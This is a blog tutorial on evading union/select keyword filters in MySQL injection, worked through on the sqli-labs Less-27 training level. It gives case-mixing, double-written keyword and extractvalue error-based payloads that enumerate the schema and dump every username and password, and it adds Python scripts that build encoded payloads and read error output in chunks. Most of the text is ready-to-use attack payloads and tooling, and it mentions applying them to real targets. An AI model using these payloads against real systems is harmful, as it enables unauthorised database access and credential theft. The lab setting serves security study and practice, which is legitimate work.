MySQL: bypassing union and select keyword filters

#Methods for bypassing union and select filters

1. Case bypass

?id=0'%A0u NI on%A0se LE c T %A01,2,3%A0and%A0'1'='1

The filter only strips the exact spellings it lists (union, UNION, Union and the same three for select), so a mixed-case keyword passes untouched. The ASCII spaces inside u NI on and se LE c T are removed by the filter's own space rule, which reassembles uNIon and seLEcT before the keyword rules run. %A0 (the 0xA0 byte) separates the tokens instead of a space because the space rule does not match it, and and '1'='1 closes the quote manually because comment characters are stripped as well.

2. Double-write bypass

?id=0'%A0uni union on%A0s select elect%A01,2,3%A0and%A0'1'='1

Each keyword is removed by a single, non-recursive pass, so write the keyword inside a copy of itself: once the spaces are gone, uni union on becomes uniunionon, the inner union is removed, and union is left over; s select elect becomes sselectelect and leaves select. This only works when that spelling is stripped once. If the same spelling is stripped a second time, change the case of one letter in the outer copy (sselectelecT leaves selecT, which the later pass no longer matches); the Less-27 demo below does exactly that for select.

3. Error injection

When the union result is not echoed, make MySQL put the data into an error message instead, for example with extractvalue(1,concat('~',(subquery))). Less-27 prints the raw MySQL error, so the third demo below uses this route.
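To make the three techniques concrete, here is an added Python model (my own illustration, not the page's or sqli-labs' code) of a blacklist that behaves the way the page describes for Less-27: it strips comment characters, '-', ASCII spaces and '+', and the listed spellings of union and select, each in one non-recursive pass, with lowercase select stripped twice. Assumptions: the exact set and order of passes is a reconstruction from the behaviour shown, and the function and technique names are mine. It builds the case and double-write payloads, percent-encodes them with %A0 in place of spaces, decodes them the way the server would, and shows which keywords survive the filter.

```python
import re
from urllib.parse import quote, unquote

# Blacklist modelled on the behaviour the page describes for sqli-labs Less-27.
# Assumption: this list is a reconstruction for illustration, not the level's
# own source. Each pass is one non-recursive re.sub, in order, so removing a
# keyword once can reassemble a second copy written around it.
FILTER_PASSES = [
    r"[/*]",    # block-comment characters
    r"-",       # '-' (kills -- comments and negative ids such as -1)
    r"#",       # '#' comments
    r"[ +]",    # ASCII space and '+' (the 0xA0 byte is not matched)
    r"select",  # lowercase select, first pass
    r"[ +]",
    r"union",   # lowercase union, stripped once
    r"select",  # lowercase select again: a bare doubled 'sselectelect' dies here
    r"UNION", r"SELECT", r"Union", r"Select",
]


def blacklist(s: str) -> str:
    """Apply every pass once, in order, like a chain of preg_replace calls."""
    for pat in FILTER_PASSES:
        s = re.sub(pat, "", s)
    return s


def mixed_case(word: str) -> str:
    """Alternate the case so the result matches none of the listed spellings."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(word))


def double_write(stripped: str, survivor: str) -> str:
    """Embed the spelling the filter strips inside the spelling we want left.
    Removing one copy of `stripped` reassembles `survivor`; give `survivor`
    a capital letter when the same spelling is stripped more than once."""
    mid = len(survivor) // 2
    return survivor[:mid] + stripped + survivor[mid:]


# Keyword spellings per technique ("plain" is the baseline that gets stripped).
TECHNIQUES = {
    "plain":  ("union", "select"),
    "case":   (mixed_case("union"), mixed_case("select")),      # uNiOn / sElEcT
    "double": (double_write("union", "union"),                   # ununionion
               double_write("select", "selecT")),                 # selselectecT
}


def build_payload(columns: str, technique: str) -> str:
    """Build the id= value: a quote to close the string, the 0xA0 byte in
    place of every space, and and '1'='1 to re-balance the quote because
    comment characters are stripped. Percent-encoded as it goes on the wire."""
    union, select = TECHNIQUES[technique]
    sql = f"0' {union} {select} {columns} and '1'='1"
    return quote(sql.replace(" ", "\xa0"), safe="'(),=~", encoding="latin-1")


def filtered_sql(payload: str) -> str:
    """What the level runs: decode the id= value, then apply the blacklist."""
    return blacklist(unquote(payload, encoding="latin-1"))


def keywords_survive(payload: str) -> bool:
    """True when both union and select (any case) reach the query."""
    out = filtered_sql(payload)
    return bool(re.search("union", out, re.I)) and bool(re.search("select", out, re.I))


if __name__ == "__main__":
    for tech in TECHNIQUES:
        p = build_payload("1,2,3", tech)
        print(f"{tech:6} {p}")
        print(f"       -> {filtered_sql(p).replace(chr(0xa0), ' ')!r}"
              f"  keywords survive: {keywords_survive(p)}")
```

Running it shows the plain payload losing both keywords while the case and double-write payloads reach the query intact; swap in a filter that loops until nothing changes and the double-write technique stops working, which is the check worth doing before relying on it against a real target.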

 

#Demo cases

1. Double-write bypass

sqli-labs-master/Less-27

1. Determine how the value is closed and whether there is an injection point

?id=1'%A0and%A0'1'='1

First pass in an ordinary parameter:

?id=1

The page echoes normally.

Now append a single quote and look at how the error message quotes the query. The page echoes:

''1'' LIMIT 0,1'

'1'' LIMIT 0,1

The 1' inside is our input; the fragment around it is '1'' LIMIT 0,1, so the value is closed with single quotes.

Enter a # to comment out the rest of the query:

?id=1'#

The page still reports an error, and not because the input is wrong: the level prints the filtered copy of the input, and the # we entered is gone. What reaches the database is

?id=1'

which is why it errors. So comment characters are filtered.

Close the quote manually with and '1'='1 instead:

?id=1' and '1'='1

The page echoes normally, but the filtered copy shows that the spaces we entered were removed as well:

?id=1'and'1'='1

Replace every space with %A0 (the 0xA0 byte, which MySQL accepts as a separator here but the space filter does not match) and the page is still normal. Then flip the condition:

?id=1'%A0and%A0'1'='2

The page reports an error. The true/false difference confirms the injection point.

2. Determine the number of columns

/?id=1'%A0ununionion%A0sselectelecT%A01,2,3%A0and%A0'1'='1

This level can be counted with order by or, as here, with union select and a growing list of values. The double-written keywords survive because the filter strips union once (ununionion leaves union) and strips lowercase select, leaving selecT; the capital T keeps what is left from being matched by a later pass.

url: ?id=1'%A0ununionion%A0sselectelecT%A01,2%A0and%A0'1'='1

reports an error (the two selects have a different number of columns).

url:?id=1'%A0ununionion%A0sselectelecT%A01,2,3%A0and%A0'1'='1

With three values the page echoes normally, so the query has 3 columns.

3. Determine which columns are echoed

?id=0'%A0ununionion%A0sselectelecT%A01,2,3%A0and%A0'1'='1

id=0 is used because the source also strips the - character, so a negative id such as -1 cannot be sent; 0 or any other non-existent value makes the first select return nothing and lets the union row show.

The page echoes columns 2 and 3 (the level prints the username and password fields), so the following steps put the subquery in position 2.

4. Get the database name

?id=0'%A0ununionion%A0seselectlecT%A01,(database()),3%A0and%A0'1'='1

The page shows the current database name: security

 

5. Get all tables

?id=0'%A0ununionion%A0sselecteleCt%A01,(sselectelecT%A0group_concat(table_name)from%A0information_Schema.tables%A0where%A0table_schema=database()),3%A0and%A0'1'='1

The tables are: emails, referers, uagents, users

 

6. Get the column information

?id=0'%A0ununionion%A0sselecteleCt%A01,(sselectelecT%A0group_concat(column_name)from%A0information_Schema.columns%A0where%A0table_schema=database()%A0and%A0table_name='users'),3%A0and%A0'1'='1

The columns of users are: id, username, password

7. Dump the data

?id=0'%A0uunionnion%A0sselectelecT%A01,(sselectelecT%A0group_concat(username,'~~',password)from%A0security.users),3%A0and%A0'1'='1

The echoed position now lists every username~~password pair from security.users.

 


2. Case bypass

1. Determine how the value is closed and whether there is an injection point

Pass in an ordinary parameter: the page echoes normally.

Append a single quote: the page reports an error, and the error message shows that the value is closed with single quotes.

Enter a comment character to comment out the rest of the query. The page's echo of the filtered input shows that the comment we entered was stripped.

Close the quote manually with and '1'='1. The filtered echo shows that the spaces we entered are stripped as well.

Use %A0 instead of spaces and the page is normal. Then enter

?id=1'%A0and%A0'1'='2

The page reports an error, which confirms the injection point.

2. Determine the number of columns

?id=1'%A0UnION%A0SelecT%A01,2,3%A0and%A0'1'='1

Mixed case is enough here: UnION and SelecT match none of the spellings the filter strips.

url:?id=1'%A0UnIOn%A0SelecT%A01,2%A0and%A0'1'='1

With two values the page reports an error.

With three values the page echoes normally, so the query has 3 columns.

3. Determine the echoed positions

?id=0'%A0UnION%A0SelecT%A01,2,3%A0and%A0'1'='1

Columns 2 and 3 are echoed on the page.

4. Get the database name

?id=0'%A0uNiOn%A0sELeCt%A01,(database()),3%A0and%A0'1'='1

The current database is security

5. Get the tables

?id=0'%A0UnIoN%A0SelEcT%A01,(SeLect%A0group_concat(table_name)from%A0information_schema.tables%A0where%A0table_schema=database()),3%A0and%A0'1'='1

emails,referers,uagents,users

6. Get the column information

?id=0'%A0UnIoN%A0SelEcT%A01,(SeLect%A0group_concat(column_name)from%A0information_schema.columns%A0where%A0table_schema=database()%A0and%A0table_name='users'),3%A0and%A0'1'='1

id, username, password

 

7. Dump the data

?id=0'%A0UnIon%A0SeLeCT%A01,(SeLeCt%A0group_concat(username,'~~',password)from%A0security.users),3%A0and%A0'1'='1

 


3. Error injection

1. Determine how the value is closed and whether there is an injection point

/?id=1'%A0and%A0'1'='2

Pass in an ordinary parameter: the page echoes normally.

Append a single quote: from the error the page shows, the value is closed with single quotes.

Try a comment to close the query: the page and its echo of the filtered input show that the # we entered was eaten.

Close the quote manually with and '1'='1. The closing works, but the spaces are filtered too.

Use %A0 instead of spaces: the filtered echo is intact and the page no longer reports an error.

Now use and '1'='2: the page reports an error, so there is an injection point.

Also, when the bare single quote went in, the page printed the raw MySQL error message, so error-based injection can be used.

To sum up: spaces are filtered and comments are filtered.

2. Get the database name

?id=1'%A0and%A0extractvalue(1,concat('~',(database())))%A0and%A0'1'='1

The error message the page echoes carries the database name: security

3. Get the tables

?id=1'%A0and%A0extractvalue(1,concat(1,concat('~',(sElEcT%A0group_concat(table_name)from%A0information_schema.tables%A0where%A0table_schema=database()))))%A0and%A0'1'='1

The '~' prefix is what makes the string invalid XPath and forces the error; the outer concat(1,...) is harmless but not needed.

 

 

 

4. Get the column information

?id=1'%A0and%A0extractvalue(1,concat(1,concat('~',(sElEcT%A0group_concat(column_name)from%A0information_schema.columns%A0where%A0table_schema=database()%A0and%A0table_name='users'))))%A0and%A0'1'='1

The error message ends with the column list: ~id,username,password'

5. Dump the data

/?id=1'%A0and%A0extractvalue(1,concat('~',(substr((sElEct%A0group_concat(username,'!!',password)from%A0security.users),1,30))))%A0and%A0'1'='1

substr(...,1,30) is there because the error message shows at most 32 characters of the string and '~' takes one of them. Move the offset (1, 31, 61, ...) to read the rest of the group_concat result.
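The substr window in the payload above exists because MySQL shows at most 32 characters of the bad XPath string in its error. As an added example (my own, not the page's), here is a Python simulation of reading the whole group_concat result in windows: a fake server evaluates the step-5 payload over constructed sample rows and returns an emulated XPATH syntax error, and the client advances the offset until a chunk shorter than the window comes back. Assumptions: the sample rows, the emulated error text and all function names are mine; no database is contacted.

```python
import re
from typing import Optional

# Constructed sample rows standing in for security.users (made up for this example).
SAMPLE_ROWS = [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "Tr0ub4dor&3")]
# What group_concat(username,'!!',password) would return for those rows.
SECRET = ",".join(f"{u}!!{p}" for u, p in SAMPLE_ROWS)

ERROR_MAX = 32  # MySQL reports at most 32 characters of the bad XPath string


def build_payload(pos: int, window: int) -> str:
    """The page's dump payload with a movable substr window. Spaces become the
    0xA0 byte because the level strips ASCII spaces (shown decoded, not
    percent-encoded)."""
    inner = "sElEct group_concat(username,'!!',password)from security.users"
    sql = (f"1' and extractvalue(1,concat('~',(substr(({inner}),{pos},{window}))))"
           " and '1'='1")
    return sql.replace(" ", "\xa0")


def fake_extractvalue_error(xpath: str) -> str:
    """Emulate MySQL's reaction to extractvalue(1, '~...'): '~' is not valid
    XPath, so the string is echoed in the error, cut to ERROR_MAX characters.
    Assumption: the text mirrors the real 'XPATH syntax error' message."""
    return f"XPATH syntax error: '{xpath[:ERROR_MAX]}'"


def fake_server(payload: str) -> str:
    """Stand-in for the vulnerable page: read pos and window back out of the
    payload, evaluate the substr over SECRET (1-indexed like MySQL's substr)
    and return the error text the page would print."""
    m = re.search(r"\),(\d+),(\d+)\)", payload)
    pos, window = int(m.group(1)), int(m.group(2))
    chunk = SECRET[pos - 1:pos - 1 + window]
    return fake_extractvalue_error("~" + chunk)


def parse_error(message: str) -> Optional[str]:
    """Recover the data that follows the '~' marker in the error text."""
    m = re.search(r"XPATH syntax error: '~(.*)'$", message)
    return m.group(1) if m else None


def dump(window: int = ERROR_MAX - 1) -> str:
    """Read the whole group_concat result window by window. '~' uses one of
    the 32 visible characters, so a window larger than 31 silently loses data
    (the page uses 30); a chunk shorter than the window marks the end."""
    out, pos = "", 1
    while True:
        chunk = parse_error(fake_server(build_payload(pos, window)))
        if chunk is None:
            break
        out += chunk
        if len(chunk) < window:
            break
        pos += window
    return out


if __name__ == "__main__":
    print(dump())
```

Against a real target, fake_server is replaced by an HTTP request whose response is searched for the error text, and the window stays at 31 or below; dump(40) in this simulation returns only the first 31 characters, which is the failure mode to watch for when a result looks suspiciously short.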

 

 

Origin blog.csdn.net/m0_72755466/article/details/130091719